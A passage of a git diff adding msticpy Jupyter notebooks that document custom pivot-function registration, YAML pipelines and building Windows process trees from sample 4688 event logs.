6aeHgw8+OBx00EHhBz/4wYqfT/aBo48+OuzZsyeccMIJYWxsLIyPj4d///d/X/HzU1NTYWxsLBx55JHh6quvDnv27AnHH3/8il9odFG4hxDC+Ph4OO6449b8cQEAAACA1WutcL/ttttKi3aF+0rnnH12ePWrX51bFNfRt8L9tNNOWzpb/Z3vfGdpmT09PR3+4z/+Y9ltP/jBD8LY2FiYmJhYdvsDDzyQu6ydO3eGsbGxcNVVVy27fffu3WFsbCzMzMyM9DzWwuOPPx7GxsbCgw8+uOaPDQAAAACszv8HuxJdwNTI6SgAAAAASUVORK5CYII="
+    }
+   },
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Example output from pipelined functions\n",
+    "\n",
+    "This is what the pipelined functions should output (although the results\n",
+    "will obviously not be the same for your environment).\n",
+    "\n",
+    "![image.png](attachment:0f98df03-f8db-4ddc-a8cd-2535ff315af5.png)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding custom functions to the pivot interface\n",
+    "\n",
+    "To do this you need the following information\n",
+    "\n",
+    "| Item                   | Description                                                                 | Required    |\n",
+    "| :--------------------- | :--------------------------                                                 | :---------- |\n",
+    "| src_module             | The src_module to containing the class or function                          | Yes         |\n",
+    "| class                  | The class containing function                                               | No          |\n",
+    "| src_func_name          | The name of the function to wrap                                            | Yes         |\n",
+    "| func_new_name          | Rename the function                                                         | No          |\n",
+    "| input type             | The input type that the wrapped function expects (dataframe iterable value) | Yes         |\n",
+    "| entity_map             | Mapping of entity and attribute used for function                           | Yes         |\n",
+    "| func_df_param_name     | The param name that the function uses as input param for DataFrame          | If DF input |\n",
+    "| func_df_col_param_name | The param name that function uses to identify the input column name         | If DF input |\n",
+    "| func_out_column_name   | Name of the column in the output DF to use as a key to join                 | If DF output|\n",
+    "| func_static_params     | dict of static name/value params always sent to the function                | No          |\n",
+    "| func_input_value_arg   | Name of the param that the wrapped function uses for its input value        | No          |\n",
+    "| can_iterate            | True if the function supports being called multiple times                   | No          |\n",
+    "| entity_container_name  | The name of the container in the entity where the func will appear          | No          |\n",
+    "\n",
+    "\n",
+    "The entity_map controls where the pivot function will be added. Each entry\n",
+    "requires an Entity name (see msticpy.datamodel.entities) and an entity\n",
+    "attribute name. This is only used if an instance of the entity is used\n",
+    "as a parameter to the function. For `IpAddress` in the example below,\n",
+    "the pivot function will try to extract the value of the `Address` attribute\n",
+    "when an instance of IpAddress is used as a function parameter.\n",
+    "\n",
+    "```yaml\n",
+    "  entity_map:\n",
+    "     IpAddress: Address\n",
+    "     Host: HostName\n",
+    "     Account: Name\n",
+    "```\n",
+    "\n",
+    "This means that you can specify different attributes of the same entity\n",
+    "for different functions (or even for two instances of the same function)\n",
+    "\n",
+    "The `func_df_param_name` and `func_df_col_param_name` are needed only if\n",
+    "the source function takes a dataframe and column name as input parameters.\n",
+    "\n",
+    "`func_out_column_name` is relevant if the source function returns a\n",
+    "dataframe. In order to join input data with output data this needs to\n",
+    "be the column in the output that has the same value as the function\n",
+    "input (e.g. if you are processing IP addresses and the column name\n",
+    "in the output DF containing the IP is named \"ip_addr\", put \"ip_addr\" here.)\n",
+    "\n",
+    "When you have this information create or add this to a yaml file\n",
+    "with the top-level element `pivot_providers`.\n",
+    "\n",
+    "Example from the msticpy ip_utils `who_is` function\n",
+    "```yaml\n",
+    "pivot_providers:\n",
+    "  ...\n",
+    "  who_is:\n",
+    "    src_module: msticpy.sectools.ip_utils\n",
+    "    src_func_name: get_whois_df\n",
+    "    func_new_name: whois\n",
+    "    input_type: dataframe\n",
+    "    entity_map:\n",
+    "      IpAddress: Address\n",
+    "    func_df_param_name: data\n",
+    "    func_df_col_param_name: ip_column\n",
+    "    func_out_column_name: ip\n",
+    "    func_static_params:\n",
+    "      whois_col: whois_result\n",
+    "    func_input_value_arg: ip_address\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once you have your yaml definition file you can call\n",
+    "```python\n",
+    "    Pivot.register_pivot_providers(\n",
+    "        pivot_reg_path=path_to_your_yaml,\n",
+    "        namespace=globals(),\n",
+    "        def_container=\"my_container\",\n",
+    "        force_container=True\n",
+    "    )\n",
+    "```\n",
+    "\n",
+    "Note, this is not persistent. You will need to call this each time you\n",
+    "start a new session."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### register_pivot_providers docstring\n",
+    "\n",
+    "```python\n",
+    "Pivot.register_pivot_providers(\n",
+    "    pivot_reg_path: str,\n",
+    "    namespace: Dict[str, Any] = None,\n",
+    "    def_container: str = 'custom',\n",
+    "    force_container: bool = False,\n",
+    ")\n",
+    "Docstring:\n",
+    "Register pivot functions from configuration file.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "file_path : str\n",
+    "    Path to config yaml file\n",
+    "namespace : Dict[str, Any], optional\n",
+    "    Namespace to search for existing instances of classes, by default None\n",
+    "container : str, optional\n",
+    "    Container name to use for entity pivot functions, by default \"other\"\n",
+    "force_container : bool, optional\n",
+    "    Force `container` value to be used even if entity definitions have\n",
+    "    specific setting for a container name, by default False\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "Pivot.register_pivot_providers?"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Adding ad hoc pivot functions\n",
+    "\n",
+    "You can also add ad hoc functions as pivot functions. This is\n",
+    "probably a less common scenario but may be useful for testing and\n",
+    "development.\n",
+    "\n",
+    "You can either create a PivotRegistration object and supply that (along\n",
+    "with the `func` parameter), to this method."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.pivot_register import PivotRegistration\n",
+    "\n",
+    "def my_func(input: str):\n",
+    "    return input.upper()\n",
+    "\n",
+    "piv_reg = PivotRegistration(\n",
+    "    input_type=\"value\",\n",
+    "    entity_map={\"Host\": \"HostName\"},\n",
+    "    func_input_value_arg=\"input\",\n",
+    "    func_new_name=\"upper_name\"\n",
+    ")\n",
+    "\n",
+    "Pivot.add_pivot_function(my_func, piv_reg, container=\"change_case\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Alternatively, you can supply the\n",
+    "pivot registration parameters as keyword arguments:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "def my_func(input: str):\n",
+    "    return input.upper()\n",
+    "\n",
+    "Pivot.add_pivot_function(\n",
+    "    func=my_func,\n",
+    "    container=\"change_case\",\n",
+    "    input_type=\"value\",\n",
+    "    entity_map={\"Host\": \"HostName\"},\n",
+    "    func_input_value_arg=\"input\",\n",
+    "    func_new_name=\"upper_name\",\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Saving and re-using pipelines as yaml\n",
+    "\n",
+    "```yaml\n",
+    "pipelines:\n",
+    "  pipeline1:\n",
+    "    description: Pipeline 1 description\n",
+    "    steps:\n",
+    "      - name: get_logons\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Standard pivot function\n",
+    "        params:\n",
+    "          column: IpAddress\n",
+    "          join: inner\n",
+    "      - name: disp_logons\n",
+    "        step_type: pivot_display\n",
+    "        comment: Pivot display\n",
+    "        params:\n",
+    "          title: \"The title\"\n",
+    "          cols:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "          query: Computer.str.startswith('MSTICAlerts')\n",
+    "          head: 10\n",
+    "      - name: tee_logons\n",
+    "        step_type: pivot_tee\n",
+    "        comment: Pivot tee\n",
+    "        params:\n",
+    "          var_name: var_df\n",
+    "          clobber: True\n",
+    "      - name: tee_logons_disp\n",
+    "        step_type: pivot_tee_exec\n",
+    "        comment: Pivot tee_exec with mp_timeline.plot\n",
+    "        function: mp_timeline.plot\n",
+    "        params:\n",
+    "          source_columns:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "      - name: logons_timeline\n",
+    "        step_type: pd_accessor\n",
+    "        comment: Standard accessor with mp_timeline.plot\n",
+    "        function: mp_timeline.plot\n",
+    "        params:\n",
+    "          source_columns:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "  pipeline2:\n",
+    "    description: Pipeline 2 description\n",
+    "    steps:\n",
+    "      - name: get_logons\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Standard pivot function\n",
+    "        params:\n",
+    "          column: IpAddress\n",
+    "          join: inner\n",
+    "      - name: disp_logons\n",
+    "        step_type: pivot_display\n",
+    "        comment: Pivot display\n",
+    "        params:\n",
+    "          title: \"The title\"\n",
+    "          cols:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "          query: Computer.str.startswith('MSTICAlerts')\n",
+    "          head: 10\n",
+    "      - name: tee_logons\n",
+    "        step_type: pivot_tee\n",
+    "        comment: Pivot tee\n",
+    "        params:\n",
+    "          var_name: var_df\n",
+    "          clobber: True\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.pivot_pipeline import Pipeline\n",
+    "\n",
+    "pipelines_yml = \"\"\"\n",
+    "pipelines:\n",
+    "  pipeline1:\n",
+    "    description: Pipeline 1 description\n",
+    "    steps:\n",
+    "      - name: get_ip_type\n",
+    "        step_type: pivot\n",
+    "        function: util.ip_type\n",
+    "        entity: IpAddress\n",
+    "        comment: Get IP Type\n",
+    "        params:\n",
+    "          column: IP\n",
+    "          join: inner\n",
+    "      - name: filter_public\n",
+    "        step_type: pd_accessor\n",
+    "        comment: Filter to only public IPs\n",
+    "        function: query\n",
+    "        pos_params:\n",
+    "          - result == \"Public\"\n",
+    "      - name: whois\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Get Whois info\n",
+    "        params:\n",
+    "          column: IP\n",
+    "          join: inner\n",
+    "      \n",
+    "\"\"\""
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "pipelines = list(Pipeline.from_yaml(pipelines_yml))\n",
+    "print(pipelines[0].print_pipeline())"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "pipeline1 = pipelines[0]\n",
+    "result_df = pipeline1.run(data=ips_df, verbose=True)\n",
+    "result_df.head(3)"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/ProcessTree.ipynb b/docs/notebooks/ProcessTree.ipynb
new file mode 100644
index 000000000..2d2dda902
--- /dev/null
+++ b/docs/notebooks/ProcessTree.ipynb
@@ -0,0 +1,6378 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#msticpy---ProcessTree\" data-toc-modified-id=\"msticpy---ProcessTree-1\">msticpy - ProcessTree</a></span><ul class=\"toc-item\"><li><span><a href=\"#Extracting-Process-Trees-from-logs\" data-toc-modified-id=\"Extracting-Process-Trees-from-logs-1.1\">Extracting Process Trees from logs</a></span></li><li><span><a href=\"#Process-Tree-utils-module\" data-toc-modified-id=\"Process-Tree-utils-module-1.2\">Process Tree utils module</a></span></li><li><span><a href=\"#Plotting-a-Process-Tree\" data-toc-modified-id=\"Plotting-a-Process-Tree-1.3\">Plotting a Process Tree</a></span></li><li><span><a href=\"#Plotting-Syntax\" data-toc-modified-id=\"Plotting-Syntax-1.4\">Plotting Syntax</a></span><ul class=\"toc-item\"><li><span><a href=\"#Parameter-descriptions\" data-toc-modified-id=\"Parameter-descriptions-1.4.1\">Parameter descriptions</a></span><ul class=\"toc-item\"><li><span><a href=\"#data-:-pd.DataFrame\" data-toc-modified-id=\"data-:-pd.DataFrame-1.4.1.1\">data : pd.DataFrame</a></span></li><li><span><a href=\"#schema-:-ProcSchema,-optional\" data-toc-modified-id=\"schema-:-ProcSchema,-optional-1.4.1.2\">schema : ProcSchema, optional</a></span></li><li><span><a href=\"#output_var-:-str,-optional\" data-toc-modified-id=\"output_var-:-str,-optional-1.4.1.3\">output_var : str, optional</a></span></li><li><span><a href=\"#legend_col-:-str,-optional\" data-toc-modified-id=\"legend_col-:-str,-optional-1.4.1.4\">legend_col : str, optional</a></span></li><li><span><a href=\"#show_table:-bool\" data-toc-modified-id=\"show_table:-bool-1.4.1.5\">show_table: bool</a></span></li></ul></li><li><span><a href=\"#Caveats\" data-toc-modified-id=\"Caveats-1.4.2\">Caveats</a></span><ul class=\"toc-item\"><li><span><a href=\"#Large-data-sets-(more-than-a-few-hundred-processses)\" data-toc-modified-id=\"Large-data-sets-(more-than-a-few-hundred-processses)-1.4.2.1\">Large data sets (more than a few hundred processses)</a></span></li><li><span><a href=\"#Font-Size\" data-toc-modified-id=\"Font-Size-1.4.2.2\">Font Size</a></span></li></ul></li></ul></li><li><span><a href=\"#Linux-Process-Tree\" data-toc-modified-id=\"Linux-Process-Tree-1.5\">Linux Process Tree</a></span></li><li><span><a href=\"#Plotting-Using-a-color-gradient\" data-toc-modified-id=\"Plotting-Using-a-color-gradient-1.6\">Plotting Using a color gradient</a></span></li><li><span><a href=\"#Process-Tree-utility-functions\" data-toc-modified-id=\"Process-Tree-utility-functions-1.7\">Process Tree utility functions</a></span><ul class=\"toc-item\"><li><span><a href=\"#Functions\" data-toc-modified-id=\"Functions-1.7.1\">Functions</a></span></li><li><span><a href=\"#get_summary_info\" data-toc-modified-id=\"get_summary_info-1.7.2\">get_summary_info</a></span></li><li><span><a href=\"#get_roots\" data-toc-modified-id=\"get_roots-1.7.3\">get_roots</a></span></li><li><span><a href=\"#get_descendents\" data-toc-modified-id=\"get_descendents-1.7.4\">get_descendents</a></span></li><li><span><a href=\"#get_children\" data-toc-modified-id=\"get_children-1.7.5\">get_children</a></span></li><li><span><a href=\"#get_tree_depth\" data-toc-modified-id=\"get_tree_depth-1.7.6\">get_tree_depth</a></span></li><li><span><a href=\"#get_parent-and-get_ancestors\" data-toc-modified-id=\"get_parent-and-get_ancestors-1.7.7\">get_parent and get_ancestors</a></span></li><li><span><a href=\"#get_process-and-build_process_key\" data-toc-modified-id=\"get_process-and-build_process_key-1.7.8\">get_process and build_process_key</a></span></li><li><span><a href=\"#get_siblings\" data-toc-modified-id=\"get_siblings-1.7.9\">get_siblings</a></span></li></ul></li><li><span><a href=\"#Display-a-Tree-using-Networkx\" data-toc-modified-id=\"Display-a-Tree-using-Networkx-1.8\">Display a Tree using Networkx</a></span></li></ul></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# msticpy - ProcessTree\n",
+    "\n",
+    "This notebook demonstrates the use of the process tree data and visualization modules. These modules can be used with either Windows process creation events (ID 4688) or Linux auditd logs.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "There are two main components:\n",
+    "- Process Tree creation - this takes a standard log from a single host and builds the parent-child relationships between processes in the data set. There are a set of utility functions to extract individual and partial trees from the processed data set.\n",
+    "- Process Tree visualization - this takes the processed output from the previous component and displays the process tree using Bokeh plots.\n",
+    "\n",
+    "**Note**  The expected schema for the Linux audit data is as produced by the `auditdextract.py` module in `msticpy`. This module combines related process exec messages into a single combined message that emulates the Windows 4688 event. This retains the audit schema apart from the following additions:\n",
+    "- `cmdline`: this is a concatenation of the `a0`, `a1`, etc argument fields\n",
+    "- `EventType`: this is the audit message type (`SYSCALL`, `EXECVE`, `CWD`, etc.) - the combined `SYSCALL_EXECVE` created by `auditextract` is the only type currently supported.\n",
+    "\n",
+    "Support for other formats such as Sysmon, Microsoft Defender is planned but not yet included."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Extracting Process Trees from logs\n",
+    "The input can be either Windows 4688 events or Linux audit events (with the above caveats)."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Import libraries and read in test data. Then call `build_process_tree` to extract the parent-child relationships between processes."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:29.356995Z",
+     "start_time": "2020-08-25T15:53:24.442999Z"
+    },
+    "execution_event_id": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd",
+    "last_executed_text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")",
+    "persistent_id": "7b5a3079-d2e1-481d-a076-8eaa96f1c430"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>NewProcessName</th>\n",
+       "      <th>TokenElevationType</th>\n",
+       "      <th>ProcessId</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ParentProcessName</th>\n",
+       "      <th>TargetLogonId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>TimeCreatedUtc</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 15:21:06.890</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xd78</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\W...</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>263a788b-6526-4cdc-8ed9-d79402fe4aa0</td>\n",
+       "      <td>2019-02-10 15:21:06.890</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 15:21:06.907</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x221c</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xd78</td>\n",
+       "      <td>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>263a788b-6526-4cdc-8ed9-d79402fe4aa0</td>\n",
+       "      <td>2019-02-10 15:21:06.907</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 14:15:36.253</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x638</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xe24</td>\n",
+       "      <td>\"C:\\Program Files\\Microsoft Monitoring Agent\\A...</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>263a788b-6526-4cdc-8ed9-d79402fe4aa0</td>\n",
+       "      <td>2019-02-10 14:15:36.253</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 14:15:36.270</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x115c</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0x638</td>\n",
+       "      <td>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>263a788b-6526-4cdc-8ed9-d79402fe4aa0</td>\n",
+       "      <td>2019-02-10 14:15:36.270</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 15:48:18.437</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-20</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e4</td>\n",
+       "      <td>0x2364</td>\n",
+       "      <td>C:\\Windows\\System32\\reg.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0x1c24</td>\n",
+       "      <td>reg  \"C:\\diagnostics\\WinBenignActivity.cmd\" -2...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>263a788b-6526-4cdc-8ed9-d79402fe4aa0</td>\n",
+       "      <td>2019-02-10 15:48:18.437</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId                     Account  EventID  \\\n",
+       "0  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n",
+       "1  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n",
+       "2  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n",
+       "3  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n",
+       "4  52b1ab41-869e-4138-9e40-2a4457f09bf0  WORKGROUP\\MSTICAlertsWin1$     4688   \n",
+       "\n",
+       "            TimeGenerated         Computer SubjectUserSid   SubjectUserName  \\\n",
+       "0 2019-02-10 15:21:06.890  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n",
+       "1 2019-02-10 15:21:06.907  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n",
+       "2 2019-02-10 14:15:36.253  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n",
+       "3 2019-02-10 14:15:36.270  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n",
+       "4 2019-02-10 15:48:18.437  MSTICAlertsWin1       S-1-5-20  MSTICAlertsWin1$   \n",
+       "\n",
+       "  SubjectDomainName SubjectLogonId NewProcessId  \\\n",
+       "0         WORKGROUP          0x3e7        0xd78   \n",
+       "1         WORKGROUP          0x3e7       0x221c   \n",
+       "2         WORKGROUP          0x3e7        0x638   \n",
+       "3         WORKGROUP          0x3e7       0x115c   \n",
+       "4         WORKGROUP          0x3e4       0x2364   \n",
+       "\n",
+       "                                      NewProcessName TokenElevationType  \\\n",
+       "0  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...             %%1936   \n",
+       "1                    C:\\Windows\\System32\\conhost.exe             %%1936   \n",
+       "2  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...             %%1936   \n",
+       "3                    C:\\Windows\\System32\\conhost.exe             %%1936   \n",
+       "4                        C:\\Windows\\System32\\reg.exe             %%1936   \n",
+       "\n",
+       "  ProcessId                                        CommandLine  \\\n",
+       "0    0x1994  \"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\W...   \n",
+       "1     0xd78  \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...   \n",
+       "2     0xe24  \"C:\\Program Files\\Microsoft Monitoring Agent\\A...   \n",
+       "3     0x638  \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...   \n",
+       "4    0x1c24  reg  \"C:\\diagnostics\\WinBenignActivity.cmd\" -2...   \n",
+       "\n",
+       "                                   ParentProcessName TargetLogonId  \\\n",
+       "0  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...           0x0   \n",
+       "1  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...           0x0   \n",
+       "2  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...           0x0   \n",
+       "3  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...           0x0   \n",
+       "4                        C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "\n",
+       "                       SourceComputerId          TimeCreatedUtc  \n",
+       "0  263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:21:06.890  \n",
+       "1  263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:21:06.907  \n",
+       "2  263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 14:15:36.253  \n",
+       "3  263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 14:15:36.270  \n",
+       "4  263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:48:18.437  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from IPython.display import display\n",
+    "import pandas as pd\n",
+    "from msticpy.nbtools import process_tree as ptree\n",
+    "\n",
+    "win_procs = pd.read_pickle(\"./data/win_proc_test.pkl\")\n",
+    "display(win_procs.head())"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:29.611997Z",
+     "start_time": "2020-08-25T15:53:29.358995Z"
+    },
+    "execution_event_id": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd",
+    "last_executed_text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")",
+    "persistent_id": "7b5a3079-d2e1-481d-a076-8eaa96f1c430"
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n"
+     ]
+    }
+   ],
+   "source": [
+    "p_tree_win = ptree.build_process_tree(win_procs, show_summary=True)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Process Tree utils module\n",
+    "The module is imported as follows:\n",
+    "```\n",
+    "from msticpy.sectools import *\n",
+    "```\n",
+    "or explicitly \n",
+    "```\n",
+    "from msticpy.sectools import process_tree_utils as pt_util\n",
+    "```\n",
+    "\n",
